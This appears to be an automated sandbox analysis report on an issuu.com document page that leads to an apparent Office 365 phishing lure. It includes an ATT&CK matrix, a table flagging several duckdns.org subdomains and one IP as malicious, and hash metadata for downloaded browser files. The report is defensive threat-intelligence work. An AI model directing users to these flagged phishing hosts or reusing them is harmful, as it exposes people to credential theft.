        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive15
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        spidersense.bendingspoons.com
        34.36.49.68
        truefalse
          high
          o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
          20.117.200.191
          truetrue
            unknown
            logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
            20.117.200.191
            truetrue
              unknown
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                bigpingback.issuu.com
                35.241.35.151
                truefalse
                  high
                  officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                  20.117.200.191
                  truetrue
                    unknown
                    issuu.com
                    151.101.129.55
                    truefalse
                      high
                      vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                      20.117.200.191
                      truetrue
                        unknown
                        o4505883345354752.ingest.sentry.io
                        34.120.195.249
                        truefalse
                          high
                          prdia888neu0aks.mkt.dynamics.com
                          52.146.128.240
                          truefalse
                            unknown
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              high
                              sni1gl.wpc.omegacdn.net
                              152.199.21.175
                              truefalse
                                high
                                www.google.com
                                172.217.21.36
                                truefalse
                                  high
                                  reader3.isu.pub
                                  unknown
                                  unknownfalse
                                    high
                                    consent.cookiebot.com
                                    unknown
                                    unknownfalse
                                      high
                                      aadcdn.msftauth.net
                                      unknown
                                      unknownfalse
                                        high
                                        static.isu.pub
                                        unknown
                                        unknownfalse
                                          high
                                          layers.isu.pub
                                          unknown
                                          unknownfalse
                                            high
                                            assets.isu.pub
                                            unknown
                                            unknownfalse
                                              high
                                              pingback.issuu.com
                                              unknown
                                              unknownfalse
                                                high
                                                api.issuu.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  image.isu.pub
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    public-eur.mkt.dynamics.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      assets-eur.mkt.dynamics.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://cdnjs.cloudflare.com/ajax/libs/styled-components/5.3.11/styled-components.min.jsfalse
                                                          high
                                                          https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29false
                                                            high
                                                            https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29/visitsfalse
                                                              high
                                                              https://spidersense.bendingspoons.com/v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0false
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.jsfalse
                                                                  high
                                                                  https://o4505883345354752.ingest.sentry.io/api/4506104688082944/envelope/?sentry_key=20169667e5c7bfec02249a8341e145fa&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.108.0false
                                                                    high
                                                                    https://pingback.issuu.com/pingfalse
                                                                      high
                                                                      https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQfalse
                                                                        high
                                                                        https://cdnjs.cloudflare.com/ajax/libs/react-is/17.0.2/umd/react-is.production.min.jsfalse
                                                                          high
                                                                          https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29false
                                                                            high
                                                                            https://cdnjs.cloudflare.com/ajax/libs/react/17.0.2/umd/react.production.min.jsfalse
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpagefochromecache_123.2.drfalse
                                                                                high
                                                                                https://reactjs.org/docs/error-decoder.html?invariant=chromecache_125.2.dr, chromecache_101.2.dr, chromecache_78.2.dr, chromecache_117.2.drfalse
                                                                                  high
                                                                                  https://issuu.com/txbct.com/docs/navex_quote_65169.chromecache_126.2.drfalse
                                                                                    high
                                                                                    https://cct.google/taggy/agent.jschromecache_105.2.dr, chromecache_119.2.drfalse
                                                                                      high
                                                                                      https://reactjs.org/link/react-polyfillschromecache_78.2.drfalse
                                                                                        high
                                                                                        https://www.google.comchromecache_105.2.dr, chromecache_119.2.drfalse
                                                                                          high
                                                                                          https://assets.nflxext.com/us/email/gem/nflx.pngchromecache_98.2.dr, chromecache_121.2.drfalse
                                                                                            high
                                                                                            https://td.doubleclick.netchromecache_105.2.dr, chromecache_119.2.drfalse
                                                                                              high
                                                                                              https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforchromecache_99.2.drfalse
                                                                                                high
                                                                                                http://ogp.me/ns#chromecache_126.2.drfalse
                                                                                                  high
                                                                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icochromecache_98.2.dr, chromecache_121.2.drfalse
                                                                                                    high
                                                                                                    https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2chromecache_126.2.drfalse
                                                                                                      high
                                                                                                      https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/forms/afd683achromecache_123.2.drfalse
                                                                                                        high
                                                                                                        https://image.isu.pub/241224193034-77c097d7eadd36d5a1226b1a395fdd6b/jpg/page_1.jpgchromecache_126.2.drfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.17.24.14
                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          20.117.200.191
                                                                                                          o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgUnited States
                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                          34.36.49.68
                                                                                                          spidersense.bendingspoons.comUnited States
                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                          239.255.255.250
                                                                                                          unknownReserved
                                                                                                          unknownunknownfalse
                                                                                                          35.241.35.151
                                                                                                          bigpingback.issuu.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          52.146.128.240
                                                                                                          prdia888neu0aks.mkt.dynamics.comUnited States
                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                          172.217.21.36
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          34.120.195.249
                                                                                                          o4505883345354752.ingest.sentry.ioUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          IP
                                                                                                          192.168.2.4
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1580520
                                                                                                          Start date and time:2024-12-24 20:55:14 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 3m 17s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                          Sample URL:https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:8
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal56.phis.troj.win@18/87@66/9
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.19.227, 142.250.181.142, 64.233.161.84, 172.217.17.46, 151.101.1.55, 151.101.65.55, 151.101.129.55, 151.101.193.55, 142.250.181.104, 23.206.197.8, 23.206.197.51, 2.22.50.144, 192.229.221.95, 184.30.21.171, 2.16.168.100, 2.16.168.114, 2.16.168.113, 2.16.168.121, 2.16.168.119, 2.16.168.107, 172.217.17.35, 23.218.208.109, 20.12.23.50, 13.107.246.63
                                                                                                          • Excluded domains from analysis (whitelisted): mwf-service.akamaized.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, a1945.g2.akamai.net, assets-mkt-eur.azureedge.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, www.googletagmanager.com, update.googleapis.com, consent.cookiebot.com-v2.edgekey.net, statics-marketingsites-eus-ms-com.akamaized.net, img-prod-cms-rt-microsoft-com.akamaized.net, assets-mkt-eur.afd.azureedge.net, fs.microsoft.com, accounts.google.com, dualstack.m.sni.global.fastly.net, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, cxppeur1umejvsjeywhjm.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, a1963.g2.akamai.net, azureedge-t-prod.trafficmanager.net, aadcdnoriginwus2.afd.azureedge.net, cxppusa1form
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ
                                                                                                          No simulations
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (33576)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33627
                                                                                                          Entropy (8bit):5.445354903056494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:mDDpDA7cGM7EnbZg27BktMd8DRXcvIcnZmwFewCf8MlOWkLQLHOvQk2hGoqlDf4g:mcogbZgb85QwQkLQ7Ob2Qf4up8nKl
                                                                                                          MD5:B1C778624E511C62BA7191803820B309
                                                                                                          SHA1:27586518D16C54905175E9EFCEC9177BEB08C769
                                                                                                          SHA-256:DCAB5E5248BC85B37B4EEED9704B51DCD785EA7FC2687D891830061D10D0635D
                                                                                                          SHA-512:8F509EE2DF88E44F47C08557F9F3EDF7A01AA154EA4450F4D5136DEC41C75980780BF3830D1271725D2DAB24996E995AB019D554F0BBC95A9232D65BAB92A212
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t(require("react-is"),require("react")):"function"==typeof define&&define.amd?define(["react-is","react"],t):(e=e||self).styled=t(e.ReactIs,e.React)}(this,(function(e,t){"use strict";var r="default"in e?e.default:e,n="default"in t?t.default:t;function i(e){return e&&"string"==typeof e.styledComponentId}var a=function(e,t){for(var r=[e[0]],n=0,i=t.length;n<i;n+=1)r.push(t[n],e[n+1]);return r},o=function(t){return null!==t&&"object"==typeof t&&"[object Object]"===(t.toString?t.toString():Object.prototype.toString.call(t))&&!e.typeOf(t)},s=Object.freeze([]),c=Object.freeze({});function l(e){return"function"==typeof e}function u(){return(u=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f="undefined"!=typeof process&&void 0!==process.env&&(process.env.REACT_APP_SC_ATTR|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):120585
                                                                                                          Entropy (8bit):5.370923647345209
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:6s276dU+/c7hEUuoiwbUgLYUR16SLq959TDqReyDjG9M5nvr2aIgq20PH:12lCy6LSl16S4PTODj+MZDDRs
                                                                                                          MD5:23BFE7E99565EE8F34AFD63C06F4C24B
                                                                                                          SHA1:BF08B8AD1AD73C12A7C9CB211926CE23A861DB07
                                                                                                          SHA-256:9DB33292007AB6C38527B39D5663E976A305564E19B2A5A8713EA2B2C00F505D
                                                                                                          SHA-512:F6318DAF93E2C1EF27CCB2D84E4F10AC430F7E3194D29C7CD066332995318BB96609FAC18EDC827355799244B9BF1570C0807B429CDCED4C4B890C5F00DDF477
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/** @license React v17.0.2. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function Ta(a,b){gb(a,b);gb(a+"Capture",b)}function gb(a,b){Ib[a]=b;for(a=0;a<b.length;a++)zf.add(b[a])}function li(a){if(Af.call(Bf,a)
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):548
                                                                                                          Entropy (8bit):4.688532577858027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
                                                                                                          MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                          SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                          SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                          SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/bundles/styles/signedout-oneui?v=fxWDPSdgdYVZRC_ceRR_L6he1M_EOZx8zyPNGpHAdOs1
                                                                                                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65461)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8082542
                                                                                                          Entropy (8bit):5.822931399874259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:0MMWJ8XaxOmejn42952VCTfPL9uTHgr2Gbr+wG/5DVojeUxEvnfqA/nhXp91gwVY:Y
                                                                                                          MD5:7D4D297AFFD074DC0FF2265A087C825A
                                                                                                          SHA1:57BEAB2052CDA8E4C0CB0B4793188A92B35602A0
                                                                                                          SHA-256:A35547545A381518BD8EF898C0EBC00ADE76AB3C64426142D158638D5AF135E6
                                                                                                          SHA-512:64570442B7F4D7232F85252EC49CBA85C00D719E3F0AF1DE0BA1603FDB57DF74A4A675E03A6BCAF47A2427676CDE4C9C24B743CF174940B83C8748228B07CA5E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! For license information please see FormLoader.bundle.js.LICENSE.txt */.var d365mktforms;(()=>{var V,U,N={686:function(V,U){var N="undefined"!=typeof self?self:this,Z=function(){function V(){this.fetch=!1,this.DOMException=N.DOMException}return V.prototype=N,new V}();!function(V){!function(U){var N="URLSearchParams"in V,Z="Symbol"in V&&"iterator"in Symbol,R="FileReader"in V&&"Blob"in V&&function(){try{return new Blob,!0}catch(V){return!1}}(),d="FormData"in V,l="ArrayBuffer"in V;if(l)var W=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],T=ArrayBuffer.isView||function(V){return V&&W.indexOf(Object.prototype.toString.call(V))>-1};function F(V){if("string"!=typeof V&&(V=String(V)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(V))throw new TypeError("Invalid character in header field name");return V.toLowerCase()}function M(V){return"strin
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 37780, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):37780
                                                                                                          Entropy (8bit):7.99360816191614
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:lsC2ANerCPjvZx4cl+OVNrOxS+miAS5VDcNTVMDeDjwT1fTWEbDFTGn:r2AICrZbl++KxSPAVDcMeDeWWTGn
                                                                                                          MD5:E1B9F0ECAAEBB12C93064CD3C406F82B
                                                                                                          SHA1:F0E872352FC5AF11960D0EB4FD6ED09E9E98F4AB
                                                                                                          SHA-256:39E72C0794C12F2DBB14A0F61CA946B535F795B1478FCF795BD26E5CB52DED34
                                                                                                          SHA-512:5FE73910046B2873220A73BE768F1153475A869EC0E59ABB06609FEF867B44B84450AD3C3140B47328DEFBBDD2CE7740791F1795D8160A50CA0AF058F925A0E2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2
                                                                                                          Preview:wOF2..............l....&..........................U.......?HVAR.?.`?STAT.8.../l.....P..{..4.0..f.6.$..d. ..\. [nYq.[......w>.._..>.m.\.o...86...@..~...'&.1....;}U.J...@.".DcD..4;3.}.gO.<1..3.....q.'...V....n.~..U....u.".R4........q+..Zu....M3P...7E..W..I.l_..N.............M..4.FS.(.....n...?....3..m..=f....~.........XT..km..+.jQ......K.P.../.p...'.....].%..x....._......BH..$.B..8@...p.)....T.b..VTZi.N..&....=TT.a.....vF.........`/*j..5S....8.....PK.#..ii/.1...;.Q.DTTTT..B..cc..;3..f&.V.6........W...s._.a.(.ChJ;n.M.sf..f./.d..........t..NR.!....aI.p@!...F...........a..F.....z.v]~).....h....(......Uw.$.-..G ..p.A..E...#...Cf7.|..vW,xA..C..P1..p1.....k/.3....l..ta@....<R.*l...sv.d.....;..3.QN..I..~......=I..-.4X.BI.....>...._.R...)F:..#.8B..^&.0.!......4...4..P.4t....u...w.9....9.......om<.xc.=....^. .]4..:]4j.BHZ......U.#...h[._^.4...Z._*....[J....I..Q#F.1b....0....0..G....cg[.,.........Y...z..T....Y...N>4M...,..GQ.....g..{i...tH.3q.a0....;..L
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (33730)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):256042
                                                                                                          Entropy (8bit):5.576218742955506
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:/k3HFitgcns2IjG+D0TzmYasxzuZ1IwPcRCr7Plka0Mf3/I4EmeVM1:/8Yns2Q7Z1HcRCr2a0Mf3/I0
                                                                                                          MD5:FAEBCB0E81A10736E9D8D63387F43B53
                                                                                                          SHA1:38BDE04534EA58B4F75060ABED040012E1CD416E
                                                                                                          SHA-256:1B5B6253E5075093E8536C4CF25D9C23396CCD7F3F99D0C8C06F2D943CF65D52
                                                                                                          SHA-512:757B47FF38965D14960C44EE02E56E2C667EFB91723DA97B9F2D874FF4B112840AC8CA8DF7CECF0A35833CA1CBD130244153F429575D02736007099889B5C38E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-N7P4N8B
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"279",. . "macros":[{"function":"__e"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=\"CookieConsent\",b=\"|\";if(a=(a=document.cookie.match(\"(^|;) ?\"+a+\"\\x3d([^;]*)(;|$)\"))?a[2]:null)a=a.toLowerCase(),\"-1\"===a?b=\"|preferences|statistics|marketing|necessary|\":(-1\u003Ca.indexOf(\"preferences:true\")\u0026\u0026(b+=\"preferences|\"),-1\u003Ca.indexOf(\"statistics:true\")\u0026\u0026(b+=\"statistics|\"),-1\u003Ca.indexOf(\"marketing:true\")\u0026\u0026(b+=\"marketing|\"),-1\u003Ca.indexOf(\"necessary:true\")\u0026\u0026(b+=\"necessary|\"));return b})();"]},{"function":"__v","vtp_setDefaultValue":true,"vtp_defaultValue":"1","vtp_name":"value_usd"},{"function":"__v","vtp_setDefaultValue":true,"vtp_defaultValue":"notset","vtp_name":"plan"},{"function":
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):548
                                                                                                          Entropy (8bit):4.688532577858027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
                                                                                                          MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                          SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                          SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                          SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/dist/oneui.razor/public/styles/amx.min.css?v=CDBD56DA1F0F5A7DECB5626A0F8E8122AAC0A70FDAACB264B2C30130BDE0A114
                                                                                                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2138
                                                                                                          Entropy (8bit):4.650574055321636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:micaIPU7oeoc8ZslkY04YOPmlgRjNOeFp3jP/PUG9C1CK0QP+B:micaQUMeB8ZsyY7YOPCgRg2jP/2CKvWB
                                                                                                          MD5:ADD8BEB3FE77F36BD318F05EB5C046A0
                                                                                                          SHA1:C9A0F7E92F52BDB5D7A4B9FAF3E24BF55F36F08F
                                                                                                          SHA-256:70A843EB912FEDE312A87A98911B5346D96045809E66D189D01F1FF5EA71961E
                                                                                                          SHA-512:B6E156C79DCC1A9B975C872AC228422106A6D617871FAB4DC0DD250D3F49C761BF9CABB1C58C78507BE00823A0C34A65677F73834B996A2E1F47ABEAE12D156D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{.. "FormFailedToLoad": "Failed to load form",.. "FormFailedToLoadCors": "The form can not be loaded on a domain that hasn't been allowed for external form hosting or there is a network connectivity issue",.. "LearnMore": "Learn more",.. "FormSubmitted": "Form submitted",.. "FormSubmitError": "Error submitting the form",.. "Reload": "Reload",.. "LookupLoading": "loading...",.. "LookupGenericError": "There was a problem retrieving items. Try again later.",.. "ValidationRequiredField": "This field is required",.. "ValidationSessionSelectionRequired": "Please choose at least one session",.. "ValidationSingleSessionSelectionRequired": "Please choose a session",.. "EventFailedToLoad": "Failed to load event.",.. "EventAtCapacity": "The event is full and is not accepting any more sign-ups.",.. "EventNotLive": "We are still setting up this event. Please check again in some time or contact the event organizer ",.. "SubmissionErrorEventNotLive": "Registrations for this event have
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (33576)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):33627
                                                                                                          Entropy (8bit):5.445354903056494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:mDDpDA7cGM7EnbZg27BktMd8DRXcvIcnZmwFewCf8MlOWkLQLHOvQk2hGoqlDf4g:mcogbZgb85QwQkLQ7Ob2Qf4up8nKl
                                                                                                          MD5:B1C778624E511C62BA7191803820B309
                                                                                                          SHA1:27586518D16C54905175E9EFCEC9177BEB08C769
                                                                                                          SHA-256:DCAB5E5248BC85B37B4EEED9704B51DCD785EA7FC2687D891830061D10D0635D
                                                                                                          SHA-512:8F509EE2DF88E44F47C08557F9F3EDF7A01AA154EA4450F4D5136DEC41C75980780BF3830D1271725D2DAB24996E995AB019D554F0BBC95A9232D65BAB92A212
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/styled-components/5.3.11/styled-components.min.js
                                                                                                          Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t(require("react-is"),require("react")):"function"==typeof define&&define.amd?define(["react-is","react"],t):(e=e||self).styled=t(e.ReactIs,e.React)}(this,(function(e,t){"use strict";var r="default"in e?e.default:e,n="default"in t?t.default:t;function i(e){return e&&"string"==typeof e.styledComponentId}var a=function(e,t){for(var r=[e[0]],n=0,i=t.length;n<i;n+=1)r.push(t[n],e[n+1]);return r},o=function(t){return null!==t&&"object"==typeof t&&"[object Object]"===(t.toString?t.toString():Object.prototype.toString.call(t))&&!e.typeOf(t)},s=Object.freeze([]),c=Object.freeze({});function l(e){return"function"==typeof e}function u(){return(u=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f="undefined"!=typeof process&&void 0!==process.env&&(process.env.REACT_APP_SC_ATTR|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):119
                                                                                                          Entropy (8bit):4.4319879552066865
                                                                                                          Encrypted:false
